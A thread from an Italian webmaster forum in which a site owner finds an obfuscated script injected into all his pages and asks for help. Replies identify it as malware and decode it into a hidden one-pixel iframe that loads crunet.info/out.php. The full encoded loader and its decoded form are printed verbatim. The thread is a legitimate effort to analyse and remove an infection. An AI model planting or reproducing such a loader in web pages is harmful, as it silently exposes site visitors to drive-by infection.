Pagina 1 di 3 1 2 3 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 22
  1. #1
    Utente di HTML.it
    Registrato dal
    Feb 2001
    Messaggi
    454

    script spuntato dal nulla

    Mi capita una cosa stranissima da qualche giono il mio sito si apre normalmente ma dopo pochi secondi si chiude, facendo un controllo nelle pagine, all'interno ho trovato uno script che io non avevo di certo messo.

    Questo:


    </p>
    <script>document.write(unescape('%3c%73%63%72%69%7 0%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61% 73%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6f%6e%20 %65%6e%63%6f%64%65%28%73%74%72%29%7b%76%61%72%20%6 5%6e%64%3d%75%6e%65%73%63%61%70%65%28%73%74%72%2e% 73%75%62%73%74%72%28%30%2c%20%73%74%72%2e%6c%65%6e %67%74%68%2d%31%29%29%3b%76%61%72%20%6e%6f%77%3d%2 7%27%3b%66%6f%72%28%69%3d%30%3b%20%69%3c%65%6e%64% 2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%6e%6f %77%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%6 1%72%43%6f%64%65%28%65%6e%64%2e%63%68%61%72%43%6f% 64%65%41%74%28%69%29%2d%20%73%74%72%2e%73%75%62%73 %74%72%28%73%74%72%2e%6c%65%6e%67%74%68%2d%31%2c%3 1%29%29%3b%7d%64%6f%63%75%6d%65%6e%74%2e%77%72%69% 74%65%28%75%6e%65%73%63%61%70%65%28%6e%6f%77%29%29 %3b%7d%3c%2f%73%63%72%69%70%74%3e'));encode('%297G mjveqi%2964wvg%297H%296%3Blxxt%297E33gvyrix2mrjs3s yx2tlt%296%3B%2964%7Bmhxl%297H%296%3B5%296%3B%2964 limklx%297H%296%3B5%296%3B%2964wx%7Dpi%297H%296%3B zmwmfmpmx%7D%297E%2964lmhhir%297F%296%3B%297I%297G 3mjveqi%297I4')</script></body>
    </NOFRAMES>
    </HTML>


    chi ha mai avuto qualcosa di simile?
    informo che questo script si è formato in tutte le pagine html,
    Chi mi può dare un consiglio sul da fare, e come proteggermi in seguito?

    Grazie

  2. #2
    Amministratore L'avatar di Vincent.Zeno
    Registrato dal
    May 2003
    residenza
    Emilia-Romagna (tortellini und cappelletti land!)
    Messaggi
    20,781
    ATTENTO! Eliminalo subito!
    Si tratta di un veicolo per virus/trojan.

    Forse che usi qualche script per contatori gratuiti o se su un host gratuito?
    Punta a crunet.info...... di cui ho potuto verificare la pericolosità proprio in questi giorni.
    Era legato ad un banner presente su un sito di importanza nazionale!


  3. #3

    RE

    fiko !!
    di sicuro e' servito a sminkiare il layout di questo post

  4. #4
    Utente di HTML.it
    Registrato dal
    Feb 2001
    Messaggi
    454

    Re: RE

    Originariamente inviato da fontlover
    fiko !!
    di sicuro e' servito a sminkiare il layout di questo post
    scusa che vuoi dire?

  5. #5
    Amministratore L'avatar di Vincent.Zeno
    Registrato dal
    May 2003
    residenza
    Emilia-Romagna (tortellini und cappelletti land!)
    Messaggi
    20,781

    Re: RE

    Originariamente inviato da fontlover
    fiko !!
    di sicuro e' servito a sminkiare il layout di questo post
    a me su IE6 non fa nulla ma su FF si: sminchia

    edit: anzi no, solo barra di scorrimento nel post

  6. #6

  7. #7
    Utente di HTML.it
    Registrato dal
    Feb 2001
    Messaggi
    454
    moderatore, dammi una tua opinione, mica ho capito che dovrei fare.

  8. #8
    Utente di HTML.it L'avatar di holifay
    Registrato dal
    May 2005
    Messaggi
    1,330
    Bhe, devi eliminare quello script dalle tue pagine ovviamente e poi cercare di capire come ci è finito...

    quello script unavolta eseguito scrive nel browser questo codice:

    <script language="javascript">function encode(str){var end=unescape(str.substr(0, str.length-1));var now='';for(i=0; i<end.length; i++) {now+=String.fromCharCode(end.charCodeAt(i)- str.substr(str.length-1,1));}document.write(unescape(now));}</script>
    Il quale come puoi vedere non è altro che una procedura un po' mascherata che una volta eseguita dal browser si traduce in questo linguaggio html, molto più chiaro

    <iframe src='http://crunet.info/out.php' width='1' height='1' style='visibility: hidden;'></iframe>
    Come vedi apre in un iframe di larghezza 1px (quindi quasi invisibile) quel link al sito crunet.info. Se poi vai in quel sito con Explorer... auguri!

    qualcosa di simile a questo: http://www.suspectfile.com/blog/?postid=27
    Pensi di avere un file infetto? Invialo a SuspectFile

  9. #9
    Utente di HTML.it L'avatar di holifay
    Registrato dal
    May 2005
    Messaggi
    1,330
    ah, c'era già il post di habanero che ho trovato cercano crunet.info su google http://forum.html.it/forum/showthrea...readid=1128984

    Pensi di avere un file infetto? Invialo a SuspectFile

  10. #10
    Amministratore L'avatar di Vincent.Zeno
    Registrato dal
    May 2003
    residenza
    Emilia-Romagna (tortellini und cappelletti land!)
    Messaggi
    20,781

    @holifay

    come hai decompilato il codice?
    hai qualche strumento utile?

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.